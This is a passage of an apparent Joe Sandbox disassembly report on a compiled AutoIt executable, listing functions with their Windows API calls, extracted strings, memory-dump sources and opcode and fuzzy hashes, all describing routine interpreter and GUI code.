                                                                                        • CreateFileW.KERNEL32(?,80000000,00000000,00000000,00000003,00000000,00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00F3A540
                                                                                        • GetFileSize.KERNEL32(00000000,00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00F3A553
                                                                                        • GlobalAlloc.KERNEL32(00000002,00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00F3A55E
                                                                                        • GlobalLock.KERNEL32(00000000), ref: 00F3A567
                                                                                        • ReadFile.KERNEL32(00000000,00000000,00000000,00000190,00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00F3A576
                                                                                        • GlobalUnlock.KERNEL32(00000000), ref: 00F3A57F
                                                                                        • CloseHandle.KERNEL32(00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00F3A586
                                                                                        • GlobalFree.KERNEL32(00000000), ref: 00F3A591
                                                                                        • CreateStreamOnHGlobal.OLE32(00000000,00000001,88C00000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00F3A5A3
                                                                                        • OleLoadPicture.OLEAUT32(88C00000,00000000,00000000,00F6D9BC,00000000), ref: 00F3A5B9
                                                                                        • GlobalFree.KERNEL32(00000000), ref: 00F3A5C9
                                                                                        • CopyImage.USER32(000001F4,00000000,00000000,00000000,00002000), ref: 00F3A5EF
                                                                                        • SendMessageW.USER32(?,00000172,00000000,000001F4), ref: 00F3A60E
                                                                                        • SetWindowPos.USER32(?,00000000,00000000,00000000,?,?,00000020,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00F3A630
                                                                                        • ShowWindow.USER32(00000004,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00F3A81D
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.2159874340.0000000000EE1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EE0000, based on PE: true
                                                                                        • Associated: 00000000.00000002.2159854081.0000000000EE0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2159928574.0000000000F6D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2159928574.0000000000F8E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2159967161.0000000000F9A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2159982529.0000000000FA4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_ee0000_CCE 30411252024.jbxd
                                                                                        Similarity
                                                                                        • API ID: Window$Global$CreateRect$File$DeleteFreeObject$AdjustAllocClientCloseCopyDesktopDestroyHandleImageLoadLockMessagePictureReadSendShowSizeStreamUnlock
                                                                                        • String ID: $AutoIt v3$DISPLAY$static
                                                                                        • API String ID: 2211948467-2373415609
                                                                                        • Opcode ID: 10fe08409f4f58eb043c3266afeb710582912fe91d9e0c71c06066b66244e877
                                                                                        • Instruction ID: 1d2cfc09a4c7cbecaaa5a16ae682d7cb4f16a8166bc43a32af50c1f34fcd080c
                                                                                        • Opcode Fuzzy Hash: 10fe08409f4f58eb043c3266afeb710582912fe91d9e0c71c06066b66244e877
                                                                                        • Instruction Fuzzy Hash: AA027D75A00218EFDB14DFA5DD89EAE7BB9FB49320F008158F915AB2A1C770DD41EB60
                                                                                        Function 00F4D285 Relevance: 49.8, APIs: 33, Instructions: 260COMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        • SetTextColor.GDI32(?,00000000), ref: 00F4D2DB
                                                                                        • GetSysColorBrush.USER32(0000000F), ref: 00F4D30C
                                                                                        • GetSysColor.USER32(0000000F), ref: 00F4D318
                                                                                        • SetBkColor.GDI32(?,000000FF), ref: 00F4D332
                                                                                        • SelectObject.GDI32(?,00000000), ref: 00F4D341
                                                                                        • InflateRect.USER32(?,000000FF,000000FF), ref: 00F4D36C
                                                                                        • GetSysColor.USER32(00000010), ref: 00F4D374
                                                                                        • CreateSolidBrush.GDI32(00000000), ref: 00F4D37B
                                                                                        • FrameRect.USER32(?,?,00000000), ref: 00F4D38A
                                                                                        • DeleteObject.GDI32(00000000), ref: 00F4D391
                                                                                        • InflateRect.USER32(?,000000FE,000000FE), ref: 00F4D3DC
                                                                                        • FillRect.USER32(?,?,00000000), ref: 00F4D40E
                                                                                        • GetWindowLongW.USER32(?,000000F0), ref: 00F4D439
                                                                                          • Part of subcall function 00F4D575: GetSysColor.USER32(00000012), ref: 00F4D5AE
                                                                                          • Part of subcall function 00F4D575: SetTextColor.GDI32(?,?), ref: 00F4D5B2
                                                                                          • Part of subcall function 00F4D575: GetSysColorBrush.USER32(0000000F), ref: 00F4D5C8
                                                                                          • Part of subcall function 00F4D575: GetSysColor.USER32(0000000F), ref: 00F4D5D3
                                                                                          • Part of subcall function 00F4D575: GetSysColor.USER32(00000011), ref: 00F4D5F0
                                                                                          • Part of subcall function 00F4D575: CreatePen.GDI32(00000000,00000001,00743C00), ref: 00F4D5FE
                                                                                          • Part of subcall function 00F4D575: SelectObject.GDI32(?,00000000), ref: 00F4D60F
                                                                                          • Part of subcall function 00F4D575: SetBkColor.GDI32(?,00000000), ref: 00F4D618
                                                                                          • Part of subcall function 00F4D575: SelectObject.GDI32(?,?), ref: 00F4D625
                                                                                          • Part of subcall function 00F4D575: InflateRect.USER32(?,000000FF,000000FF), ref: 00F4D644
                                                                                          • Part of subcall function 00F4D575: RoundRect.GDI32(?,?,?,?,?,00000005,00000005), ref: 00F4D65B
                                                                                          • Part of subcall function 00F4D575: GetWindowLongW.USER32(00000000,000000F0), ref: 00F4D670
                                                                                          • Part of subcall function 00F4D575: SendMessageW.USER32(00000000,0000000E,00000000,00000000), ref: 00F4D698
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.2159874340.0000000000EE1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EE0000, based on PE: true
                                                                                        • Associated: 00000000.00000002.2159854081.0000000000EE0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2159928574.0000000000F6D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2159928574.0000000000F8E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2159967161.0000000000F9A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2159982529.0000000000FA4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_ee0000_CCE 30411252024.jbxd
                                                                                        Similarity
                                                                                        • API ID: Color$Rect$Object$BrushInflateSelect$CreateLongTextWindow$DeleteFillFrameMessageRoundSendSolid
                                                                                        • String ID:
                                                                                        • API String ID: 3521893082-0
                                                                                        • Opcode ID: dd01a9bd4eb2f0e1d83715eefc5d9dd92e4f25f9733107af3cdb77c781e04ad0
                                                                                        • Instruction ID: dc56047613f455b546dae3137bc73e30cc1c24f7f1ed4362152a49fb2f23ff9b
                                                                                        • Opcode Fuzzy Hash: dd01a9bd4eb2f0e1d83715eefc5d9dd92e4f25f9733107af3cdb77c781e04ad0
                                                                                        • Instruction Fuzzy Hash: 5191D172908309BFDB109F64DC08E6B7BA9FF89325F140A19F962961E0C7B1D940EB52
                                                                                        Function 00F2DBC4 Relevance: 45.7, APIs: 3, Strings: 23, Instructions: 187COMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        • SetErrorMode.KERNEL32(00000001), ref: 00F2DBD6
                                                                                        • GetDriveTypeW.KERNEL32(?,00F7DC54,?,\\.\,00F7DC00), ref: 00F2DCC3
                                                                                        • SetErrorMode.KERNEL32(00000000,00F7DC54,?,\\.\,00F7DC00), ref: 00F2DE29
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.2159874340.0000000000EE1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EE0000, based on PE: true
                                                                                        • Associated: 00000000.00000002.2159854081.0000000000EE0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2159928574.0000000000F6D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2159928574.0000000000F8E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2159967161.0000000000F9A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2159982529.0000000000FA4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_ee0000_CCE 30411252024.jbxd
                                                                                        Similarity
                                                                                        • API ID: ErrorMode$DriveType
                                                                                        • String ID: 1394$ATA$ATAPI$CDROM$Fibre$FileBackedVirtual$Fixed$MMC$Network$PhysicalDrive$RAID$RAMDisk$Removable$SAS$SATA$SCSI$SSA$SSD$USB$Unknown$Virtual$\\.\$iSCSI
                                                                                        • API String ID: 2907320926-4222207086
                                                                                        • Opcode ID: 979fe1ac758eefd1c987249fabf041e630ed8a1df165422a35e1c0780aac1f8f
                                                                                        • Instruction ID: abf8794197c4eb9c849f9c830ca8024f9e629e343e403f277750fe098e2a7e85
                                                                                        • Opcode Fuzzy Hash: 979fe1ac758eefd1c987249fabf041e630ed8a1df165422a35e1c0780aac1f8f
                                                                                        • Instruction Fuzzy Hash: 8651E23164CB66AF8B10DF10E881929B7E0FB94715B60581AF017EB2A1DB70D945FB43
                                                                                        Function 00EECC24 Relevance: 44.0, APIs: 12, Strings: 13, Instructions: 267COMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.2159874340.0000000000EE1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EE0000, based on PE: true
                                                                                        • Associated: 00000000.00000002.2159854081.0000000000EE0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2159928574.0000000000F6D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2159928574.0000000000F8E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2159967161.0000000000F9A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2159982529.0000000000FA4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_ee0000_CCE 30411252024.jbxd
                                                                                        Similarity
                                                                                        • API ID: __wcsnicmp
                                                                                        • String ID: #OnAutoItStartRegister$#ce$#comments-end$#comments-start$#cs$#include$#include-once$#notrayicon$#pragma compile$#requireadmin$Bad directive syntax error$Cannot parse #include$Unterminated group of comments
                                                                                        • API String ID: 1038674560-86951937
                                                                                        • Opcode ID: df239b60eaa702c21373b0d6028ed0e11fe1dcaf5deb12a62db8a0fc73dd252a
                                                                                        • Instruction ID: efdaf4317a19af9fb995d7ea71a6a2ec644e03c1c24c0d3d3e09f4393fed1951
                                                                                        • Opcode Fuzzy Hash: df239b60eaa702c21373b0d6028ed0e11fe1dcaf5deb12a62db8a0fc73dd252a
                                                                                        • Instruction Fuzzy Hash: 01812C3064025DBBCB24AB65DC43FBF77B8AF15301F245125FE09761C2EB61DA06E292
                                                                                        Function 00F4C6E9 Relevance: 42.4, APIs: 23, Strings: 1, Instructions: 447windowCOMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        • SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000000,00000013,?,?,?), ref: 00F4C788
                                                                                        • SendMessageW.USER32(?,0000113F,00000000,00000008), ref: 00F4C83E
                                                                                        • SendMessageW.USER32(?,00001102,00000002,?), ref: 00F4C859
                                                                                        • SendMessageW.USER32(?,000000F1,?,00000000), ref: 00F4CB15
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.2159874340.0000000000EE1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EE0000, based on PE: true
                                                                                        • Associated: 00000000.00000002.2159854081.0000000000EE0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2159928574.0000000000F6D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2159928574.0000000000F8E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2159967161.0000000000F9A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2159982529.0000000000FA4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_ee0000_CCE 30411252024.jbxd
                                                                                        Similarity
                                                                                        • API ID: MessageSend$Window
                                                                                        • String ID: 0
                                                                                        • API String ID: 2326795674-4108050209
                                                                                        • Opcode ID: e644e7eaf7d53c7f4ba6a75d1a7ecc65ddbc9d4d4386081ecf48a570c4eef007
                                                                                        • Instruction ID: 131d340a3202982d109df43ac3cb2b2ef9515b4508c708eb7ffa59ba6615bf6d
                                                                                        • Opcode Fuzzy Hash: e644e7eaf7d53c7f4ba6a75d1a7ecc65ddbc9d4d4386081ecf48a570c4eef007
                                                                                        • Instruction Fuzzy Hash: 0DF10271A06304AFE3618F24CC85BAABFE4FF49364F081529F999D22A1C775C840EBD1
                                                                                        Function 00F4638D Relevance: 42.4, APIs: 1, Strings: 23, Instructions: 352COMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        • CharUpperBuffW.USER32(?,?,00F7DC00), ref: 00F46449
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.2159874340.0000000000EE1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EE0000, based on PE: true
                                                                                        • Associated: 00000000.00000002.2159854081.0000000000EE0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2159928574.0000000000F6D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2159928574.0000000000F8E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2159967161.0000000000F9A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2159982529.0000000000FA4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_ee0000_CCE 30411252024.jbxd
                                                                                        Similarity
                                                                                        • API ID: BuffCharUpper
                                                                                        • String ID: ADDSTRING$CHECK$CURRENTTAB$DELSTRING$EDITPASTE$FINDSTRING$GETCURRENTCOL$GETCURRENTLINE$GETCURRENTSELECTION$GETLINE$GETLINECOUNT$GETSELECTED$HIDEDROPDOWN$ISCHECKED$ISENABLED$ISVISIBLE$SELECTSTRING$SENDCOMMANDID$SETCURRENTSELECTION$SHOWDROPDOWN$TABLEFT$TABRIGHT$UNCHECK
                                                                                        • API String ID: 3964851224-45149045
                                                                                        • Opcode ID: 7659b48eeb66b1d356052f3f158b796c2f4f77bde088951eb27d4d4b76098e7e
                                                                                        • Instruction ID: ff49f4d0be7e27404704662717c7f1744d63d2577f2442910992b88fc8cf54d9
                                                                                        • Opcode Fuzzy Hash: 7659b48eeb66b1d356052f3f158b796c2f4f77bde088951eb27d4d4b76098e7e
                                                                                        • Instruction Fuzzy Hash: D6C183306042498BCB04EF10C551AAEBBD5AF96354F044869FD45AB3E3DB25ED4BEB43
                                                                                        Function 00F4D575 Relevance: 39.2, APIs: 26, Instructions: 186windowCOMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        • GetSysColor.USER32(00000012), ref: 00F4D5AE
                                                                                        • SetTextColor.GDI32(?,?), ref: 00F4D5B2
                                                                                        • GetSysColorBrush.USER32(0000000F), ref: 00F4D5C8
                                                                                        • GetSysColor.USER32(0000000F), ref: 00F4D5D3
                                                                                        • CreateSolidBrush.GDI32(?), ref: 00F4D5D8
                                                                                        • GetSysColor.USER32(00000011), ref: 00F4D5F0
                                                                                        • CreatePen.GDI32(00000000,00000001,00743C00), ref: 00F4D5FE
                                                                                        • SelectObject.GDI32(?,00000000), ref: 00F4D60F
                                                                                        • SetBkColor.GDI32(?,00000000), ref: 00F4D618
                                                                                        • SelectObject.GDI32(?,?), ref: 00F4D625
                                                                                        • InflateRect.USER32(?,000000FF,000000FF), ref: 00F4D644
                                                                                        • RoundRect.GDI32(?,?,?,?,?,00000005,00000005), ref: 00F4D65B
                                                                                        • GetWindowLongW.USER32(00000000,000000F0), ref: 00F4D670
                                                                                        • SendMessageW.USER32(00000000,0000000E,00000000,00000000), ref: 00F4D698
                                                                                        • GetWindowTextW.USER32(00000000,00000000,00000001), ref: 00F4D6BF
                                                                                        • InflateRect.USER32(?,000000FD,000000FD), ref: 00F4D6DD
                                                                                        • DrawFocusRect.USER32(?,?), ref: 00F4D6E8
                                                                                        • GetSysColor.USER32(00000011), ref: 00F4D6F6
                                                                                        • SetTextColor.GDI32(?,00000000), ref: 00F4D6FE
                                                                                        • DrawTextW.USER32(?,00000000,000000FF,?,?), ref: 00F4D712
                                                                                        • SelectObject.GDI32(?,00F4D2A5), ref: 00F4D729
                                                                                        • DeleteObject.GDI32(?), ref: 00F4D734
                                                                                        • SelectObject.GDI32(?,?), ref: 00F4D73A
                                                                                        • DeleteObject.GDI32(?), ref: 00F4D73F
                                                                                        • SetTextColor.GDI32(?,?), ref: 00F4D745
                                                                                        • SetBkColor.GDI32(?,?), ref: 00F4D74F
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.2159874340.0000000000EE1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EE0000, based on PE: true
                                                                                        • Associated: 00000000.00000002.2159854081.0000000000EE0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2159928574.0000000000F6D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2159928574.0000000000F8E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2159967161.0000000000F9A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2159982529.0000000000FA4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_ee0000_CCE 30411252024.jbxd
                                                                                        Similarity
                                                                                        • API ID: Color$Object$Text$RectSelect$BrushCreateDeleteDrawInflateWindow$FocusLongMessageRoundSendSolid
                                                                                        • String ID:
                                                                                        • API String ID: 1996641542-0
                                                                                        • Opcode ID: fa867d0df48abfab8a8a37270ccba607adfb3fe40055db524be85b3054954c8e
                                                                                        • Instruction ID: 783b372a25df80ee1fbfb0e954a40d28c192dd63341f17624be658b37e1a95a4
                                                                                        • Opcode Fuzzy Hash: fa867d0df48abfab8a8a37270ccba607adfb3fe40055db524be85b3054954c8e
                                                                                        • Instruction Fuzzy Hash: 13512D71E00218BFDF109FA4DC48EAE7B79EF09324F154515F925AB2A1D7B19A40EF50
                                                                                        Function 00F4B6C4 Relevance: 38.9, APIs: 21, Strings: 1, Instructions: 400windowCOMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        • SendMessageW.USER32(?,00000158,000000FF,0000014E), ref: 00F4B7B0
                                                                                        • SendMessageW.USER32(?,0000014E,00000000,00000000), ref: 00F4B7C1
                                                                                        • CharNextW.USER32(0000014E), ref: 00F4B7F0
                                                                                        • SendMessageW.USER32(?,0000014B,00000000,00000000), ref: 00F4B831
                                                                                        • SendMessageW.USER32(?,00000158,000000FF,00000158), ref: 00F4B847
                                                                                        • SendMessageW.USER32(?,0000014E,00000000,00000000), ref: 00F4B858
                                                                                        • SendMessageW.USER32(?,000000C2,00000001,0000014E), ref: 00F4B875
                                                                                        • SetWindowTextW.USER32(?,0000014E), ref: 00F4B8C7
                                                                                        • SendMessageW.USER32(?,000000B1,000F4240,000F423F), ref: 00F4B8DD
                                                                                        • SendMessageW.USER32(?,00001002,00000000,?), ref: 00F4B90E
                                                                                        • _memset.LIBCMT ref: 00F4B933
                                                                                        • SendMessageW.USER32(00000000,00001060,00000001,00000004), ref: 00F4B97C
                                                                                        • _memset.LIBCMT ref: 00F4B9DB
                                                                                        • SendMessageW.USER32 ref: 00F4BA05
                                                                                        • SendMessageW.USER32(?,00001074,?,00000001), ref: 00F4BA5D
                                                                                        • SendMessageW.USER32(?,0000133D,?,?), ref: 00F4BB0A
                                                                                        • InvalidateRect.USER32(?,00000000,00000001), ref: 00F4BB2C
                                                                                        • GetMenuItemInfoW.USER32(?), ref: 00F4BB76
                                                                                        • SetMenuItemInfoW.USER32(?,?,00000000,00000030), ref: 00F4BBA3
                                                                                        • DrawMenuBar.USER32(?), ref: 00F4BBB2
                                                                                        • SetWindowTextW.USER32(?,0000014E), ref: 00F4BBDA
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.2159874340.0000000000EE1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EE0000, based on PE: true
                                                                                        • Associated: 00000000.00000002.2159854081.0000000000EE0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2159928574.0000000000F6D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2159928574.0000000000F8E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2159967161.0000000000F9A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2159982529.0000000000FA4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_ee0000_CCE 30411252024.jbxd
                                                                                        Similarity
                                                                                        • API ID: MessageSend$Menu$InfoItemTextWindow_memset$CharDrawInvalidateNextRect
                                                                                        • String ID: 0
                                                                                        • API String ID: 1073566785-4108050209
                                                                                        • Opcode ID: 40487ba72cc05ef81714bced6a54786c339a1d2f97f4a50a3354bcc5160cc41e
                                                                                        • Instruction ID: 61c7c0cb4b96709297a5f17f6ea028c9b1358e28448e805ceb66b0360088d6ab
                                                                                        • Opcode Fuzzy Hash: 40487ba72cc05ef81714bced6a54786c339a1d2f97f4a50a3354bcc5160cc41e
                                                                                        • Instruction Fuzzy Hash: 00E17D7190021CABDB209F65CC84AEE7F78FF05724F148156FD29AA292DB75CA41EF60
                                                                                        Function 00F4764F Relevance: 37.0, APIs: 18, Strings: 3, Instructions: 290windowCOMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        • GetCursorPos.USER32(?), ref: 00F4778A
                                                                                        • GetDesktopWindow.USER32 ref: 00F4779F
                                                                                        • GetWindowRect.USER32(00000000), ref: 00F477A6
                                                                                        • GetWindowLongW.USER32(?,000000F0), ref: 00F47808
                                                                                        • DestroyWindow.USER32(?), ref: 00F47834
                                                                                        • CreateWindowExW.USER32(00000008,tooltips_class32,00000000,00000003,80000000,80000000,80000000,80000000,00000000,00000000,00000000,00000000), ref: 00F4785D
                                                                                        • SendMessageW.USER32(00000000,00000432,00000000,00000030), ref: 00F4787B
                                                                                        • SendMessageW.USER32(?,00000439,00000000,00000030), ref: 00F478A1
                                                                                        • SendMessageW.USER32(?,00000421,?,?), ref: 00F478B6
                                                                                        • SendMessageW.USER32(?,0000041D,00000000,00000000), ref: 00F478C9
                                                                                        • IsWindowVisible.USER32(?), ref: 00F478E9
                                                                                        • SendMessageW.USER32(?,00000412,00000000,D8F0D8F0), ref: 00F47904
                                                                                        • SendMessageW.USER32(?,00000411,00000001,00000030), ref: 00F47918
                                                                                        • GetWindowRect.USER32(?,?), ref: 00F47930
                                                                                        • MonitorFromPoint.USER32(?,?,00000002), ref: 00F47956
                                                                                        • GetMonitorInfoW.USER32 ref: 00F47970
                                                                                        • CopyRect.USER32(?,?), ref: 00F47987
                                                                                        • SendMessageW.USER32(?,00000412,00000000), ref: 00F479F2
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.2159874340.0000000000EE1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EE0000, based on PE: true
                                                                                        • Associated: 00000000.00000002.2159854081.0000000000EE0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2159928574.0000000000F6D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2159928574.0000000000F8E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2159967161.0000000000F9A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2159982529.0000000000FA4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_ee0000_CCE 30411252024.jbxd
                                                                                        Similarity
                                                                                        • API ID: MessageSendWindow$Rect$Monitor$CopyCreateCursorDesktopDestroyFromInfoLongPointVisible
                                                                                        • String ID: ($0$tooltips_class32
                                                                                        • API String ID: 698492251-4156429822
                                                                                        • Opcode ID: 70cb03c2eda3108e3c4a5eee78316cffd6a4f035085332ed69ad01564b5dfc24
                                                                                        • Instruction ID: bb9241c365b9cdadf611fc4390f600c4f2d28f77dd75df9face73eb30c95bcea
                                                                                        • Opcode Fuzzy Hash: 70cb03c2eda3108e3c4a5eee78316cffd6a4f035085332ed69ad01564b5dfc24
                                                                                        • Instruction Fuzzy Hash: 42B1A271A08344AFDB04EF65C948B5ABBE5FF88310F00891DF9999B291D771EC04DB92
                                                                                        Function 00F26CE9 Relevance: 36.9, APIs: 16, Strings: 5, Instructions: 178COMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        • GetFileVersionInfoSizeW.VERSION(?,?), ref: 00F26CFB
                                                                                        • GetFileVersionInfoW.VERSION(?,00000000,00000000,00000000,?,?), ref: 00F26D21
                                                                                        • _wcscpy.LIBCMT ref: 00F26D4F
                                                                                        • _wcscmp.LIBCMT ref: 00F26D5A
                                                                                        • _wcscat.LIBCMT ref: 00F26D70
                                                                                        • _wcsstr.LIBCMT ref: 00F26D7B
                                                                                        • VerQueryValueW.VERSION(?,\VarFileInfo\Translation,?,?,?,?,?,?,00000000,?,?), ref: 00F26D97
                                                                                        • _wcscat.LIBCMT ref: 00F26DE0
                                                                                        • _wcscat.LIBCMT ref: 00F26DE7
                                                                                        • _wcsncpy.LIBCMT ref: 00F26E12
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.2159874340.0000000000EE1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EE0000, based on PE: true
                                                                                        • Associated: 00000000.00000002.2159854081.0000000000EE0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2159928574.0000000000F6D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2159928574.0000000000F8E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2159967161.0000000000F9A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2159982529.0000000000FA4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_ee0000_CCE 30411252024.jbxd
                                                                                        Similarity
                                                                                        • API ID: _wcscat$FileInfoVersion$QuerySizeValue_wcscmp_wcscpy_wcsncpy_wcsstr
                                                                                        • String ID: %u.%u.%u.%u$04090000$DefaultLangCodepage$StringFileInfo\$\VarFileInfo\Translation
                                                                                        • API String ID: 699586101-1459072770
                                                                                        • Opcode ID: 879b991a0cac6b59b234579db0851340af55ce313185f6339c366bdb560e5a06
                                                                                        • Instruction ID: 7689fa177a83718d6021fe8c9acec78947ae2c0fdb5fb0f7864fdeb1a6e909cf
                                                                                        • Opcode Fuzzy Hash: 879b991a0cac6b59b234579db0851340af55ce313185f6339c366bdb560e5a06
                                                                                        • Instruction Fuzzy Hash: DF41E572A002187BEB01AB649D47EBF77BCEF45310F144066F905E6182EF78DA01B6A6
                                                                                        Function 00EFA856 Relevance: 33.5, APIs: 18, Strings: 1, Instructions: 285windowtimeCOMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        • SystemParametersInfoW.USER32(00000030,00000000,000000FF,00000000), ref: 00EFA939
                                                                                        • GetSystemMetrics.USER32(00000007), ref: 00EFA941
                                                                                        • SystemParametersInfoW.USER32(00000030,00000000,000000FF,00000000), ref: 00EFA96C
                                                                                        • GetSystemMetrics.USER32(00000008), ref: 00EFA974
                                                                                        • GetSystemMetrics.USER32(00000004), ref: 00EFA999
                                                                                        • SetRect.USER32(000000FF,00000000,00000000,000000FF,000000FF), ref: 00EFA9B6
                                                                                        • AdjustWindowRectEx.USER32(000000FF,00000000,00000000,00000000), ref: 00EFA9C6
                                                                                        • CreateWindowExW.USER32(00000000,AutoIt v3 GUI,?,00000000,?,000000FF,000000FF,000000FF,?,00000000,00000000), ref: 00EFA9F9
                                                                                        • SetWindowLongW.USER32(00000000,000000EB,00000000), ref: 00EFAA0D
